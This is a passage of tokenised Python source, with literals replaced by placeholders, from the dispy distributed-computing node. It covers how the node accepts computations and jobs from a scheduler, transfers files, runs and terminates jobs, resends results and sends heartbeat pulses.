scheduler_ip , '<STR_LIT:port>' : scheduler_port } ) <EOL> while True : <EOL> msg , addr = yield self . udp_sock . recvfrom ( <NUM_LIT:1000> ) <EOL> if msg . startswith ( b'<STR_LIT>' ) : <EOL> try : <EOL> info = unserialize ( msg [ len ( b'<STR_LIT>' ) : ] ) <EOL> if info [ '<STR_LIT:version>' ] != _dispy_version : <EOL> _dispy_logger . warning ( '<STR_LIT>' , addr [ <NUM_LIT:0> ] ) <EOL> continue <EOL> except : <EOL> _dispy_logger . debug ( '<STR_LIT>' , addr [ <NUM_LIT:0> ] , addr [ <NUM_LIT:1> ] ) <EOL> continue <EOL> Coro ( self . send_pong_msg , info , addr ) <EOL> elif msg . startswith ( b'<STR_LIT>' ) : <EOL> try : <EOL> info = unserialize ( msg [ len ( b'<STR_LIT>' ) : ] ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' , addr [ <NUM_LIT:0> ] ) <EOL> else : <EOL> if info [ '<STR_LIT>' ] == self . scheduler [ '<STR_LIT>' ] : <EOL> now = time . time ( ) <EOL> for compute in self . computations . values ( ) : <EOL> compute . last_pulse = now <EOL> else : <EOL> _dispy_logger . warning ( '<STR_LIT>' , addr [ <NUM_LIT:0> ] ) <EOL> def tcp_server ( self ) : <EOL> while <NUM_LIT:1> : <EOL> try : <EOL> conn , addr = yield self . tcp_sock . accept ( ) <EOL> except GeneratorExit : <EOL> break <EOL> except : <EOL> _dispy_logger . debug ( traceback . format_exc ( ) ) <EOL> continue <EOL> Coro ( self . tcp_serve_task , conn , addr ) <EOL> def tcp_serve_task ( self , conn , addr , coro = None ) : <EOL> def job_request_task ( msg ) : <EOL> try : <EOL> _job = unserialize ( msg ) <EOL> except : <EOL> _dispy_logger . debug ( '<STR_LIT>' , addr [ <NUM_LIT:0> ] ) <EOL> raise StopIteration <EOL> compute = self . computations . get ( _job . compute_id , None ) <EOL> if compute is not None : <EOL> if compute . scheduler_ip_addr != self . scheduler [ '<STR_LIT>' ] or compute . scheduler_port != self . scheduler [ '<STR_LIT:port>' ] or compute . auth not in self . scheduler [ '<STR_LIT>' ] : <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> compute . scheduler_ip_addr , compute . scheduler_port , <EOL> self . scheduler [ '<STR_LIT>' ] , self . scheduler [ '<STR_LIT:port>' ] ) <EOL> compute = None <EOL> if self . avail_cpus == <NUM_LIT:0> : <EOL> try : <EOL> yield conn . send_msg ( '<STR_LIT>' . encode ( ) ) <EOL> except : <EOL> pass <EOL> raise StopIteration <EOL> elif compute is None : <EOL> _dispy_logger . warning ( '<STR_LIT>' , _job . compute_id ) <EOL> try : <EOL> yield conn . send_msg ( ( '<STR_LIT>' % <EOL> _job . compute_id ) . encode ( ) ) <EOL> except : <EOL> pass <EOL> raise StopIteration <EOL> for xf in _job . xfer_files : <EOL> if MaxFileSize and xf . stat_buf . st_size > MaxFileSize : <EOL> try : <EOL> yield conn . send_msg ( '<STR_LIT>' . encode ( ) ) <EOL> except : <EOL> pass <EOL> raise StopIteration <EOL> reply_addr = ( compute . scheduler_ip_addr , compute . job_result_port ) <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> _job . uid , addr [ <NUM_LIT:0> ] , compute . scheduler_ip_addr ) <EOL> if compute . type == _Compute . func_type : <EOL> reply = _JobReply ( _job , self . ext_ip_addr ) <EOL> reply . start_time = time . time ( ) <EOL> job_info = _DispyJobInfo ( reply , reply_addr , compute , _job . xfer_files ) <EOL> args = ( job_info , self . certfile , self . keyfile , compute . name , <EOL> _job . args , _job . kwargs , ( compute . code , _job . code ) , <EOL> compute . globals , compute . dest_path , self . reply_Q ) <EOL> try : <EOL> yield conn . send_msg ( b'<STR_LIT>' ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' , str ( addr ) ) <EOL> raise StopIteration <EOL> proc = multiprocessing . Process ( target = _dispy_job_func , args = args ) <EOL> self . avail_cpus -= <NUM_LIT:1> <EOL> compute . pending_jobs += <NUM_LIT:1> <EOL> self . thread_lock . acquire ( ) <EOL> self . job_infos [ _job . uid ] = job_info <EOL> self . thread_lock . release ( ) <EOL> try : <EOL> proc . start ( ) <EOL> except : <EOL> job_info . job_reply . status = DispyJob . Terminated <EOL> job_info . job_reply . exception = traceback . format_exc ( ) <EOL> job_info . job_reply . end_time = time . time ( ) <EOL> job_info . proc = None <EOL> self . reply_Q . put ( job_info . job_reply ) <EOL> else : <EOL> job_info . proc = proc <EOL> job_info . job_reply . status = DispyJob . Running <EOL> raise StopIteration <EOL> elif compute . type == _Compute . prog_type : <EOL> try : <EOL> yield conn . send_msg ( b'<STR_LIT>' ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' , str ( addr ) ) <EOL> raise StopIteration <EOL> reply = _JobReply ( _job , self . ext_ip_addr ) <EOL> reply . start_time = time . time ( ) <EOL> job_info = _DispyJobInfo ( reply , reply_addr , compute , _job . xfer_files ) <EOL> job_info . job_reply . status = DispyJob . Running <EOL> self . thread_lock . acquire ( ) <EOL> self . job_infos [ _job . uid ] = job_info <EOL> self . thread_lock . release ( ) <EOL> self . avail_cpus -= <NUM_LIT:1> <EOL> compute . pending_jobs += <NUM_LIT:1> <EOL> prog_thread = threading . Thread ( target = self . __job_program , args = ( _job , job_info ) ) <EOL> prog_thread . start ( ) <EOL> raise StopIteration <EOL> else : <EOL> try : <EOL> yield conn . send_msg ( ( '<STR_LIT>' % <EOL> compute . type ) . encode ( ) ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' , str ( addr ) ) <EOL> def add_computation_task ( msg ) : <EOL> try : <EOL> compute = unserialize ( msg ) <EOL> except : <EOL> try : <EOL> yield conn . send_msg ( ( '<STR_LIT>' ) . encode ( ) ) <EOL> except : <EOL> pass <EOL> raise StopIteration <EOL> if not ( ( self . scheduler [ '<STR_LIT>' ] is None and not self . scheduler [ '<STR_LIT>' ] ) or <EOL> ( self . scheduler [ '<STR_LIT>' ] == compute . scheduler_ip_addr and <EOL> self . scheduler [ '<STR_LIT:port>' ] == compute . scheduler_port and <EOL> self . service_available ( ) ) ) : <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> compute . scheduler_ip_addr , self . scheduler [ '<STR_LIT>' ] , <EOL> self . avail_cpus , self . num_cpus ) <EOL> try : <EOL> yield conn . send_msg ( ( '<STR_LIT>' ) . encode ( ) ) <EOL> except : <EOL> pass <EOL> raise StopIteration <EOL> if MaxFileSize : <EOL> for xf in compute . xfer_files : <EOL> if xf . stat_buf . st_size > MaxFileSize : <EOL> try : <EOL> yield conn . send_msg ( ( '<STR_LIT>' % <EOL> ( xf . name , MaxFileSize ) ) . encode ( ) ) <EOL> except : <EOL> pass <EOL> raise StopIteration <EOL> compute . xfer_files = set ( ) <EOL> dest = os . path . join ( self . dest_path_prefix , compute . scheduler_ip_addr ) <EOL> if not os . path . isdir ( dest ) : <EOL> try : <EOL> os . mkdir ( dest ) <EOL> except : <EOL> yield conn . send_msg ( ( '<STR_LIT>' ) . encode ( ) ) <EOL> raise StopIteration <EOL> if compute . dest_path and isinstance ( compute . dest_path , str ) : <EOL> if not compute . dest_path . startswith ( os . sep ) : <EOL> compute . dest_path = os . path . join ( dest , compute . dest_path ) <EOL> if not os . path . isdir ( compute . dest_path ) : <EOL> try : <EOL> os . makedirs ( compute . dest_path ) <EOL> except : <EOL> try : <EOL> yield conn . send_msg ( ( '<STR_LIT>' ) . encode ( ) ) <EOL> except : <EOL> pass <EOL> raise StopIteration <EOL> else : <EOL> compute . dest_path = tempfile . mkdtemp ( prefix = compute . name + '<STR_LIT:_>' , dir = dest ) <EOL> os . chmod ( compute . dest_path , stat . S_IRUSR | stat . S_IWUSR | stat . S_IXUSR ) <EOL> if compute . id in self . computations : <EOL> _dispy_logger . warning ( '<STR_LIT>' , <EOL> compute . name , compute . id ) <EOL> setattr ( compute , '<STR_LIT>' , time . time ( ) ) <EOL> setattr ( compute , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> setattr ( compute , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> setattr ( compute , '<STR_LIT>' , False ) <EOL> setattr ( compute , '<STR_LIT>' , { } ) <EOL> setattr ( compute , '<STR_LIT>' , set ( sys . modules . keys ( ) ) ) <EOL> setattr ( compute , '<STR_LIT>' , { } ) <EOL> if compute . code : <EOL> try : <EOL> code = compute . code <EOL> code += self . __init_code <EOL> code = compile ( code , '<STR_LIT>' , '<STR_LIT>' ) <EOL> except : <EOL> if os . path . isdir ( compute . dest_path ) : <EOL> os . rmdir ( compute . dest_path ) <EOL> try : <EOL> yield conn . send_msg ( ( '<STR_LIT>' % <EOL> ( self . ext_ip_addr , compute . name ) ) . encode ( ) ) <EOL> except : <EOL> pass <EOL> raise StopIteration <EOL> compute . code = marshal . dumps ( code ) <EOL> if compute . type == _Compute . prog_type : <EOL> compute . name = os . path . join ( compute . dest_path , os . path . basename ( compute . name ) ) <EOL> if not ( ( self . scheduler [ '<STR_LIT>' ] is None ) or <EOL> ( self . scheduler [ '<STR_LIT>' ] == compute . scheduler_ip_addr and <EOL> self . scheduler [ '<STR_LIT:port>' ] == compute . scheduler_port ) ) : <EOL> if os . path . isdir ( compute . dest_path ) : <EOL> try : <EOL> os . rmdir ( compute . dest_path ) <EOL> yield conn . send_msg ( serialize ( - <NUM_LIT:1> ) ) <EOL> except : <EOL> pass <EOL> raise StopIteration <EOL> self . computations [ compute . id ] = compute <EOL> self . scheduler [ '<STR_LIT>' ] = compute . scheduler_ip_addr <EOL> self . scheduler [ '<STR_LIT:port>' ] = compute . scheduler_port <EOL> self . scheduler [ '<STR_LIT>' ] . add ( compute . auth ) <EOL> compute_save = os . path . join ( self . dest_path_prefix , '<STR_LIT>' % ( compute . id , compute . auth ) ) <EOL> fd = open ( compute_save , '<STR_LIT:wb>' ) <EOL> pickle . dump ( compute , fd ) <EOL> fd . close ( ) <EOL> if os . name == '<STR_LIT>' : <EOL> compute . globals = { } <EOL> else : <EOL> for var in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) : <EOL> compute . globals [ var ] = globals ( ) [ var ] <EOL> compute . globals . update ( self . __init_modules ) <EOL> compute . globals [ '<STR_LIT>' ] = None <EOL> try : <EOL> yield conn . send_msg ( serialize ( self . avail_cpus ) ) <EOL> except : <EOL> del self . computations [ compute . id ] <EOL> compute . globals = { } <EOL> self . scheduler [ '<STR_LIT>' ] = None <EOL> self . scheduler [ '<STR_LIT>' ] . discard ( compute . auth ) <EOL> os . remove ( compute_save ) <EOL> if os . path . isdir ( compute . dest_path ) : <EOL> try : <EOL> os . rmdir ( compute . dest_path ) <EOL> except : <EOL> pass <EOL> else : <EOL> self . pulse_interval = num_min ( self . pulse_interval , compute . pulse_interval ) <EOL> if not self . pulse_interval : <EOL> self . pulse_interval = <NUM_LIT:10> * <NUM_LIT> <EOL> if self . zombie_interval : <EOL> self . pulse_interval = num_min ( self . pulse_interval , self . zombie_interval / <NUM_LIT> ) <EOL> self . timer_coro . resume ( True ) <EOL> def xfer_file_task ( msg ) : <EOL> try : <EOL> xf = unserialize ( msg ) <EOL> except : <EOL> _dispy_logger . debug ( '<STR_LIT>' , addr [ <NUM_LIT:0> ] ) <EOL> raise StopIteration <EOL> compute = self . computations . get ( xf . compute_id , None ) <EOL> if not compute or ( MaxFileSize and xf . stat_buf . st_size > MaxFileSize ) : <EOL> _dispy_logger . error ( '<STR_LIT>' , xf . name ) <EOL> yield conn . send_msg ( serialize ( - <NUM_LIT:1> ) ) <EOL> raise StopIteration <EOL> tgt = os . path . join ( compute . dest_path , os . path . basename ( xf . name ) ) <EOL> if os . path . isfile ( tgt ) and _same_file ( tgt , xf ) : <EOL> if tgt in compute . file_uses : <EOL> compute . file_uses [ tgt ] += <NUM_LIT:1> <EOL> else : <EOL> compute . file_uses [ tgt ] = <NUM_LIT:2> <EOL> yield conn . send_msg ( serialize ( xf . stat_buf . st_size ) ) <EOL> else : <EOL> try : <EOL> fd = open ( tgt , '<STR_LIT:wb>' ) <EOL> recvd = <NUM_LIT:0> <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> xf . name , tgt , xf . stat_buf . st_size ) <EOL> while recvd < xf . stat_buf . st_size : <EOL> yield conn . send_msg ( serialize ( recvd ) ) <EOL> data = yield conn . recvall ( min ( xf . stat_buf . st_size - recvd , <NUM_LIT> ) ) <EOL> if not data : <EOL> break <EOL> fd . write ( data ) <EOL> recvd += len ( data ) <EOL> yield conn . send_msg ( serialize ( recvd ) ) <EOL> fd . close ( ) <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> tgt , recvd , xf . stat_buf . st_size ) <EOL> assert recvd == xf . stat_buf . st_size <EOL> os . utime ( tgt , ( xf . stat_buf . st_atime , xf . stat_buf . st_mtime ) ) <EOL> os . chmod ( tgt , stat . S_IMODE ( xf . stat_buf . st_mode ) ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' , <EOL> xf . name , traceback . format_exc ( ) ) <EOL> os . remove ( tgt ) <EOL> else : <EOL> if tgt in compute . file_uses : <EOL> compute . file_uses [ tgt ] += <NUM_LIT:1> <EOL> else : <EOL> compute . file_uses [ tgt ] = <NUM_LIT:1> <EOL> raise StopIteration <EOL> def setup_computation ( msg ) : <EOL> try : <EOL> compute_id = unserialize ( msg ) <EOL> compute = self . computations [ compute_id ] <EOL> assert isinstance ( compute . setup , _Function ) <EOL> os . chdir ( compute . dest_path ) <EOL> localvars = { '<STR_LIT>' : compute . setup . args , <EOL> '<STR_LIT>' : compute . setup . kwargs } <EOL> if os . name == '<STR_LIT>' : <EOL> globalvars = globals ( ) <EOL> else : <EOL> globalvars = compute . globals <EOL> exec ( marshal . loads ( compute . code ) , globalvars , localvars ) <EOL> exec ( '<STR_LIT>' % <EOL> compute . setup . name , globalvars , localvars ) <EOL> if os . name == '<STR_LIT>' : <EOL> compute . globals . update ( { var : globals ( ) [ var ] for var in globals ( ) <EOL> if var not in self . __init_globals } ) <EOL> except : <EOL> _dispy_logger . debug ( '<STR_LIT>' ) <EOL> resp = traceback . format_exc ( ) . encode ( ) <EOL> else : <EOL> resp = b'<STR_LIT>' <EOL> if resp != b'<STR_LIT>' : <EOL> if not compute . cleanup : <EOL> compute . cleanup = True <EOL> compute . zombie = True <EOL> self . cleanup_computation ( compute ) <EOL> yield conn . send_msg ( resp ) <EOL> def terminate_job_task ( compute , job_info ) : <EOL> if not job_info . proc : <EOL> raise StopIteration <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> job_info . job_reply . uid , compute . name ) <EOL> job_info . proc . terminate ( ) <EOL> if isinstance ( job_info . proc , multiprocessing . Process ) : <EOL> for x in range ( <NUM_LIT:20> ) : <EOL> if job_info . proc . is_alive ( ) : <EOL> yield coro . sleep ( <NUM_LIT:0.1> ) <EOL> else : <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> compute . name , job_info . job_reply . uid ) <EOL> break <EOL> else : <EOL> _dispy_logger . warning ( '<STR_LIT>' , compute . name ) <EOL> raise StopIteration <EOL> else : <EOL> assert isinstance ( job_info . proc , subprocess . Popen ) <EOL> for x in range ( <NUM_LIT:20> ) : <EOL> rc = job_info . proc . poll ( ) <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> compute . name , job_info . job_reply . uid , rc ) <EOL> if rc is not None : <EOL> break <EOL> if x == <NUM_LIT:10> : <EOL> _dispy_logger . debug ( '<STR_LIT>' , job_info . job_reply . uid ) <EOL> job_info . proc . kill ( ) <EOL> yield coro . sleep ( <NUM_LIT:0.1> ) <EOL> else : <EOL> _dispy_logger . warning ( '<STR_LIT>' , compute . name ) <EOL> raise StopIteration <EOL> job_info . job_reply . end_time = time . time ( ) <EOL> job_info . proc = None <EOL> self . thread_lock . acquire ( ) <EOL> if self . job_infos . get ( job_info . job_reply . uid , None ) == job_info : <EOL> job_info . job_reply . status = DispyJob . Terminated <EOL> self . reply_Q . put ( job_info . job_reply ) <EOL> self . thread_lock . release ( ) <EOL> def retrieve_job_task ( msg ) : <EOL> def send_reply ( reply ) : <EOL> try : <EOL> yield conn . send_msg ( serialize ( reply ) ) <EOL> except : <EOL> raise StopIteration ( - <NUM_LIT:1> ) <EOL> raise StopIteration ( <NUM_LIT:0> ) <EOL> try : <EOL> req = unserialize ( msg ) <EOL> uid = req [ '<STR_LIT>' ] <EOL> compute_id = req [ '<STR_LIT>' ] <EOL> auth = req [ '<STR_LIT>' ] <EOL> job_hash = req [ '<STR_LIT>' ] <EOL> except : <EOL> yield send_reply ( None ) <EOL> raise StopIteration <EOL> pkl_path = os . path . join ( self . dest_path_prefix , '<STR_LIT>' % ( compute_id , auth ) ) <EOL> compute = self . computations . get ( compute_id , None ) <EOL> if not compute : <EOL> fd = open ( pkl_path , '<STR_LIT:rb>' ) <EOL> compute = pickle . load ( fd ) <EOL> fd . close ( ) <EOL> if not compute or compute . auth != auth : <EOL> yield send_reply ( None ) <EOL> raise StopIteration <EOL> info_file = os . path . join ( compute . dest_path , '<STR_LIT>' % uid ) <EOL> if not os . path . isfile ( info_file ) : <EOL> yield send_reply ( None ) <EOL> raise StopIteration <EOL> try : <EOL> fd = open ( info_file , '<STR_LIT:rb>' ) <EOL> job_reply = pickle . load ( fd ) <EOL> fd . close ( ) <EOL> assert job_reply . hash == job_hash <EOL> except : <EOL> yield send_reply ( None ) <EOL> raise StopIteration <EOL> try : <EOL> yield conn . send_msg ( serialize ( job_reply ) ) <EOL> ack = yield conn . recv_msg ( ) <EOL> assert ack == b'<STR_LIT>' <EOL> compute . pending_results -= <NUM_LIT:1> <EOL> fd = open ( pkl_path , '<STR_LIT:wb>' ) <EOL> pickle . dump ( compute , fd ) <EOL> fd . close ( ) <EOL> except : <EOL> pass <EOL> else : <EOL> try : <EOL> os . remove ( info_file ) <EOL> except : <EOL> pass <EOL> if compute . pending_results == <NUM_LIT:0> : <EOL> self . cleanup_computation ( compute ) <EOL> try : <EOL> req = yield conn . recvall ( len ( self . auth ) ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' ) <EOL> conn . close ( ) <EOL> raise StopIteration <EOL> msg = yield conn . recv_msg ( ) <EOL> if req != self . auth : <EOL> if msg . startswith ( b'<STR_LIT>' ) : <EOL> pass <EOL> else : <EOL> _dispy_logger . warning ( '<STR_LIT>' ) <EOL> conn . close ( ) <EOL> raise StopIteration <EOL> if not msg : <EOL> conn . close ( ) <EOL> raise StopIteration <EOL> if msg . startswith ( b'<STR_LIT>' ) : <EOL> msg = msg [ len ( b'<STR_LIT>' ) : ] <EOL> yield job_request_task ( msg ) <EOL> conn . close ( ) <EOL> elif msg . startswith ( b'<STR_LIT>' ) : <EOL> msg = msg [ len ( b'<STR_LIT>' ) : ] <EOL> yield add_computation_task ( msg ) <EOL> conn . close ( ) <EOL> elif msg . startswith ( b'<STR_LIT>' ) : <EOL> msg = msg [ len ( b'<STR_LIT>' ) : ] <EOL> yield xfer_file_task ( msg ) <EOL> conn . close ( ) <EOL> elif msg . startswith ( b'<STR_LIT>' ) : <EOL> msg = msg [ len ( b'<STR_LIT>' ) : ] <EOL> yield setup_computation ( msg ) <EOL> conn . close ( ) <EOL> elif msg . startswith ( b'<STR_LIT>' ) : <EOL> msg = msg [ len ( b'<STR_LIT>' ) : ] <EOL> try : <EOL> info = unserialize ( msg ) <EOL> compute_id = info [ '<STR_LIT>' ] <EOL> auth = info [ '<STR_LIT>' ] <EOL> terminate_pending = info . get ( '<STR_LIT>' , False ) <EOL> except : <EOL> _dispy_logger . debug ( '<STR_LIT>' , traceback . format_exc ( ) ) <EOL> else : <EOL> compute = self . computations . get ( compute_id , None ) <EOL> if compute is None or compute . auth != auth : <EOL> _dispy_logger . warning ( '<STR_LIT>' , compute_id ) <EOL> else : <EOL> compute . zombie = True <EOL> if terminate_pending : <EOL> self . thread_lock . acquire ( ) <EOL> job_infos = [ job_info for job_info in self . job_infos . values ( ) <EOL> if job_info . compute_id == compute_id ] <EOL> self . thread_lock . release ( ) <EOL> for job_info in job_infos : <EOL> yield terminate_job_task ( compute , job_info ) <EOL> self . cleanup_computation ( compute ) <EOL> yield conn . send_msg ( b'<STR_LIT>' ) <EOL> conn . close ( ) <EOL> elif msg . startswith ( b'<STR_LIT>' ) : <EOL> msg = msg [ len ( b'<STR_LIT>' ) : ] <EOL> try : <EOL> _job = unserialize ( msg ) <EOL> compute = self . computations [ _job . compute_id ] <EOL> self . thread_lock . acquire ( ) <EOL> job_info = self . job_infos . get ( _job . uid , None ) <EOL> self . thread_lock . release ( ) <EOL> assert job_info is not None <EOL> except : <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> addr [ <NUM_LIT:0> ] , compute . scheduler_ip_addr ) <EOL> else : <EOL> yield terminate_job_task ( compute , job_info ) <EOL> conn . close ( ) <EOL> elif msg . startswith ( b'<STR_LIT>' ) : <EOL> msg = msg [ len ( b'<STR_LIT>' ) : ] <EOL> try : <EOL> info = unserialize ( msg ) <EOL> compute_id = info [ '<STR_LIT>' ] <EOL> auth = info [ '<STR_LIT>' ] <EOL> except : <EOL> reply = <NUM_LIT:0> <EOL> else : <EOL> compute = self . computations . get ( compute_id , None ) <EOL> if compute is None or compute . auth != auth : <EOL> try : <EOL> fd = open ( os . path . join ( self . dest_path_prefix , <EOL> '<STR_LIT>' % ( compute_id , auth ) ) , '<STR_LIT:rb>' ) <EOL> compute = pickle . load ( fd ) <EOL> fd . close ( ) <EOL> except : <EOL> pass <EOL> if compute is None : <EOL> reply = <NUM_LIT:0> <EOL> else : <EOL> reply = compute . pending_results + compute . pending_jobs <EOL> yield conn . send_msg ( serialize ( reply ) ) <EOL> conn . close ( ) <EOL> if reply > <NUM_LIT:0> : <EOL> yield self . resend_job_results ( compute , coro = coro ) <EOL> elif msg . startswith ( b'<STR_LIT>' ) : <EOL> try : <EOL> info = unserialize ( msg [ len ( b'<STR_LIT>' ) : ] ) <EOL> if ( info [ '<STR_LIT:version>' ] == _dispy_version and <EOL> not self . scheduler [ '<STR_LIT>' ] and not self . job_infos ) : <EOL> Coro ( self . send_pong_msg , info , addr ) <EOL> except : <EOL> _dispy_logger . debug ( traceback . format_exc ( ) ) <EOL> conn . close ( ) <EOL> elif msg . startswith ( b'<STR_LIT>' ) : <EOL> msg = msg [ len ( b'<STR_LIT>' ) : ] <EOL> reply = { '<STR_LIT>' : [ ] , '<STR_LIT>' : <NUM_LIT:0> } <EOL> try : <EOL> info = unserialize ( msg ) <EOL> compute_id = info [ '<STR_LIT>' ] <EOL> auth = info [ '<STR_LIT>' ] <EOL> except : <EOL> pass <EOL> else : <EOL> compute = self . computations . get ( compute_id , None ) <EOL> if compute is None or compute . auth != auth : <EOL> fd = open ( os . path . join ( self . dest_path_prefix , <EOL> '<STR_LIT>' % ( compute_id , auth ) ) , '<STR_LIT:rb>' ) <EOL> compute = pickle . load ( fd ) <EOL> fd . close ( ) <EOL> if compute is not None : <EOL> done = [ ] <EOL> if compute . pending_results : <EOL> for result_file in glob . glob ( os . path . join ( compute . dest_path , <EOL> '<STR_LIT>' ) ) : <EOL> result_file = os . path . basename ( result_file ) <EOL> try : <EOL> uid = int ( result_file [ len ( '<STR_LIT>' ) : ] ) <EOL> except : <EOL> pass <EOL> else : <EOL> done . append ( uid ) <EOL> if len ( done ) > <NUM_LIT:50> : <EOL> break <EOL> reply [ '<STR_LIT>' ] = done <EOL> reply [ '<STR_LIT>' ] = compute . pending_jobs <EOL> yield conn . send_msg ( serialize ( reply ) ) <EOL> conn . close ( ) <EOL> elif msg . startswith ( b'<STR_LIT>' ) : <EOL> msg = msg [ len ( b'<STR_LIT>' ) : ] <EOL> yield retrieve_job_task ( msg ) <EOL> conn . close ( ) <EOL> else : <EOL> _dispy_logger . warning ( '<STR_LIT>' , <EOL> msg [ : min ( <NUM_LIT:10> , len ( msg ) ) ] , addr [ <NUM_LIT:0> ] ) <EOL> resp = ( '<STR_LIT>' % ( msg [ : min ( <NUM_LIT:10> , len ( msg ) ) ] ) ) . encode ( ) <EOL> try : <EOL> yield conn . send_msg ( resp ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' , str ( addr ) ) <EOL> conn . close ( ) <EOL> def resend_job_results ( self , compute , coro = None ) : <EOL> if not os . path . isdir ( compute . dest_path ) : <EOL> raise StopIteration <EOL> result_files = [ f for f in os . listdir ( compute . dest_path ) <EOL> if f . startswith ( '<STR_LIT>' ) ] <EOL> result_files = result_files [ : min ( len ( result_files ) , <NUM_LIT:64> ) ] <EOL> for result_file in result_files : <EOL> result_file = os . path . join ( compute . dest_path , result_file ) <EOL> try : <EOL> fd = open ( result_file , '<STR_LIT:rb>' ) <EOL> job_result = pickle . load ( fd ) <EOL> fd . close ( ) <EOL> except : <EOL> _dispy_logger . debug ( '<STR_LIT>' , result_file ) <EOL> continue <EOL> job_info = _DispyJobInfo ( job_result , ( compute . scheduler_ip_addr , <EOL> compute . job_result_port ) , compute , [ ] ) <EOL> status = yield self . _send_job_reply ( job_info , resending = True ) <EOL> if status : <EOL> break <EOL> def timer_task ( self , coro = None ) : <EOL> coro . set_daemon ( ) <EOL> last_pulse_time = last_zombie_time = time . time ( ) <EOL> while True : <EOL> reset = yield coro . suspend ( self . pulse_interval ) <EOL> if reset : <EOL> continue <EOL> now = time . time ( ) <EOL> if self . pulse_interval and ( now - last_pulse_time ) >= self . pulse_interval : <EOL> if self . scheduler [ '<STR_LIT>' ] : <EOL> last_pulse_time = now <EOL> sock = AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_DGRAM ) ) <EOL> sock . settimeout ( MsgTimeout ) <EOL> info = { '<STR_LIT>' : self . ext_ip_addr , '<STR_LIT:port>' : self . port , <EOL> '<STR_LIT>' : self . num_cpus - self . avail_cpus , <EOL> '<STR_LIT>' : self . scheduler [ '<STR_LIT>' ] } <EOL> if psutil : <EOL> info [ '<STR_LIT>' ] = DispyNodeAvailInfo ( <EOL> <NUM_LIT> - psutil . cpu_percent ( ) , psutil . virtual_memory ( ) . available , <EOL> psutil . disk_usage ( self . dest_path_prefix ) . free , <EOL> <NUM_LIT> - psutil . swap_memory ( ) . percent ) <EOL> else : <EOL> info [ '<STR_LIT>' ] = None <EOL> yield sock . sendto ( b'<STR_LIT>' + serialize ( info ) , <EOL> ( self . scheduler [ '<STR_LIT>' ] , self . scheduler [ '<STR_LIT:port>' ] ) ) <EOL> sock . close ( ) <EOL> resend = [ compute for compute in self . computations . values ( ) <EOL> if compute . pending_results and not compute . zombie ] <EOL> for compute in resend : <EOL> Coro ( self . resend_job_results , compute ) <EOL> if self . zombie_interval and ( now - last_zombie_time ) >= self . zombie_interval : <EOL> last_zombie_time = now <EOL> for compute in self . computations . values ( ) : <EOL> if ( now - compute . last_pulse ) > self . zombie_interval : <EOL> _dispy_logger . warning ( '<STR_LIT>' , compute . name ) <EOL> compute . zombie = True <EOL> zombies = [ compute for compute in self . computations . values ( ) <EOL> if compute . zombie and compute . pending_jobs == <NUM_LIT:0> ] <EOL> for compute in zombies : <EOL> _dispy_logger . warning ( '<STR_LIT>' , compute . name ) <EOL> self . cleanup_computation ( compute ) <EOL> for compute in zombies : <EOL> sock = AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) , <EOL> keyfile = self . keyfile , certfile = self . certfile ) <EOL> sock . settimeout ( MsgTimeout ) <EOL> _dispy_logger . debug ( '<STR_LIT>' , compute . scheduler_ip_addr ) <EOL> info = { '<STR_LIT>' : self . ext_ip_addr , '<STR_LIT:port>' : self . port , '<STR_LIT>' : self . sign } <EOL> try : <EOL> yield sock . connect ( ( compute . scheduler_ip_addr , compute . scheduler_port ) ) <EOL> yield sock . send_msg ( '<STR_LIT>' . encode ( ) + serialize ( info ) ) <EOL> except : <EOL> pass <EOL> finally : <EOL> sock . close ( ) <EOL> if ( not self . scheduler [ '<STR_LIT>' ] and not self . job_infos and self . avail_cpus > <NUM_LIT:0> ) : <EOL> self . pulse_interval = None <EOL> yield self . broadcast_ping_msg ( coro = coro ) <EOL> def service_available ( self ) : <EOL> if self . serve == <NUM_LIT:0> : <EOL> return False <EOL> if not self . service_start or not self . service_end : <EOL> return True <EOL> now = time . localtime ( ) <EOL> if self . service_stop : <EOL> end = self . service_stop <EOL> else : <EOL> end = self . service_end <EOL> if self . service_start < end : <EOL> if self . service_start <= ( now . tm_hour , now . tm_min ) < end : <EOL> return True <EOL> else : <EOL> if ( now . tm_hour , now . tm_min ) >= self . service_start or ( now . tm_hour , now . tm_min ) < end : <EOL> return True <EOL> return False <EOL> def service_schedule ( self , coro = None ) : <EOL> coro . set_daemon ( ) <EOL> while True : <EOL> yield coro . sleep ( <NUM_LIT> ) <EOL> if self . service_available ( ) : <EOL> yield self . broadcast_ping_msg ( coro = coro ) <EOL> else : <EOL> if self . scheduler [ '<STR_LIT>' ] : <EOL> now = time . localtime ( ) <EOL> if self . service_end and ( now . tm_hour , now . tm_min ) > self . service_end : <EOL> _dispy_logger . debug ( '<STR_LIT>' ) <EOL> self . shutdown ( quit = False ) <EOL> else : <EOL> _dispy_logger . debug ( '<STR_LIT>' ) <EOL> sock = AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) , <EOL> keyfile = self . keyfile , certfile = self . certfile ) <EOL> sock . settimeout ( MsgTimeout ) <EOL> try : <EOL> yield sock . connect ( ( self . scheduler [ '<STR_LIT>' ] , self . scheduler [ '<STR_LIT:port>' ] ) ) <EOL> info = { '<STR_LIT>' : self . ext_ip_addr , '<STR_LIT>' : self . sign , '<STR_LIT>' : <NUM_LIT:0> } 